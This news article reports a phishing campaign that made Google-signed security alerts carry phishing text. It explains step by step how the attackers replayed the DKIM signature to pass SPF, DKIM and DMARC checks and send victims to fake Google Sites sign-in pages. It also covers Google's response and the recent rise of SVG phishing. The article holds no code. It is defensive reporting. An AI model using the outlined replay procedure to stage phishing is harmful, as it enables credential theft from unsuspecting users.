Cybersecurity experts are raising alarms over a highly advanced phishing campaign that leverages Google’s infrastructure to send seemingly legitimate emails that redirect users to malicious websites. The attackers have used a clever technique that not only evades standard Gmail security filters but also exploits the trust users place in Google-branded domains and services.
The campaign came to light when Nick Johnson, lead developer of the Ethereum Name Service (ENS), shared his experience on X. Johnson revealed that the phishing email he received was actually sent from “[email protected],” a genuine Google email address. More disturbingly, it passed DomainKeys Identified Mail (DKIM) authentication checks, which most email platforms use to verify message authenticity. As a result, Gmail accepted the email without issuing any warnings and placed it in a thread with legitimate Google security alerts.
The email claimed to inform recipients about a subpoena issued by law enforcement concerning unspecified content stored in their Google account. It then instructed users to visit a link hosted on Google’s own site — sites.google[.]com — to view or contest the supposed subpoena. Clicking the link led users to a phishing page that convincingly mimicked the official Google Support portal. Victims were given two options: “upload additional documents” or “view the case.” Regardless of the choice, both buttons led to a fraudulent Google sign-in page hosted on Google Sites — a tool that, ironically, is intended to simplify webpage creation for non-technical users.
Google Explains reasons for Attacks
Johnson explained that Google Sites, being a legacy product, supports the embedding of custom JavaScript and other scripting tools. This feature, while flexible, also enables attackers to build fake login pages that are difficult to distinguish from the real ones. The attackers are also believed to be swiftly replacing their pages whenever one is flagged and removed by Google’s abuse team. Unfortunately, the Google Sites interface lacks a built-in option to report abuse, giving cybercriminals further freedom to operate.
DKIM Replay and Infrastructure Misuse
What makes this attack particularly innovative is its use of a DKIM replay technique. The attackers first create a Google account with an email address like “me@<domain>.com.” They then build a Google OAuth application and assign it a name that contains the body of the phishing email. When they authorize the app, Google sends a “Security Alert” to the associated “me@” account, warning about the new app access.
Because the email originates from Google itself, it carries a valid DKIM signature. The attackers then forward that signed message via an Outlook account, routing it through a custom Simple Mail Transfer Protocol (SMTP) server called Jellyfish. This message is received by Namecheap’s PrivateEmail infrastructure and then forwarded into the victim’s Gmail inbox.
The result is a message that passes all standard security checks, including SPF, DKIM, and DMARC — making it indistinguishable from an actual Google email. Johnson noted an additional tactic: because the malicious Google account was named “me@,” Gmail displays the recipient address simply as “me,” which matches how Gmail labels your own email address in messages. This further obscures the fraudulent nature of the email and increases the likelihood of users trusting and engaging with it.
When contacted for comment, Google said that the abuse vector had been shut down and that new protections were rolled out to prevent similar incidents. A spokesperson emphasized that Google never requests login credentials, passwords, or one-time codes via email or phone. Users are strongly encouraged to activate two-factor authentication (2FA) or adopt passkeys for enhanced security.
A Surge in Advanced Phishing Techniques
This incident is just the latest in a growing wave of sophisticated phishing attacks that combine technical manipulation with social engineering. Just nine months ago, researchers at Guardio Labs revealed a vulnerability in Proofpoint’s email systems that allowed millions of spoofed emails impersonating major brands like IBM, Best Buy, Nike, and Disney to bypass security filters.
There’s also been a recent rise in phishing campaigns using Scalable Vector Graphics (SVG) attachments. According to Russian cybersecurity firm Kaspersky, over 4,100 phishing emails containing SVG files have been detected since the beginning of 2025. These SVG files can embed both HTML and JavaScript code, allowing them to redirect users to malicious Microsoft login pages or fake Google Voice portals.
Kaspersky analysts warn that phishers are constantly evolving. “They vary their tactics, sometimes using redirection and obfuscation, and other times experimenting with different file formats,” the firm said. “The SVG format offers attackers a powerful tool to embed malicious content within what appears to be an image.”
